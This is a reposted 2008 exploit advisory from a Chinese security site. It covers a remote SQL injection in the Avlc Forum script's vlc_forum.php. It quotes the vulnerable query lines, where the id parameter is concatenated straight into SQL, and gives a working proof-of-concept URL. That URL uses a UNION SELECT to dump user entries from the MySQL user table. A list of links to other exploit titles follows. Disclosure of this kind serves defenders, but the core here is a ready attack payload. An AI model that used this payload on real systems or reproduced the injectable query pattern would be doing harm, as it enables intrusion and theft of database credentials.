手机
当前位置:查字典教程网 >网络安全 >Exploit >Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
摘要:====================================================================Av...

====================================================================

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

====================================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

` ---------------------------^----------|

`_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / ` /

/ XXXXXX /______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 12 July 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : Avlc Forum

VERSION : N/A

VENDOR : N/A

DOWNLOAD : http://www.easy-script.com/compt.php?id=2147

#####################################################

-- Remote SQL Injection ---

---------------------------------

Vulnerable File [vlc_forum.php]

---------------------------------

@Line

141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";

142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());

-------------

POC Exploit

-------------

[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#####################################################################

【Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability】相关文章:

minb 0.1.0 Remote Code Execution Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Dreampics Builder (page) Remote SQL Injection Vulnerability

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

LoveCMS 1.6.2 Final Update Settings Remote Exploit

精品推荐
分类导航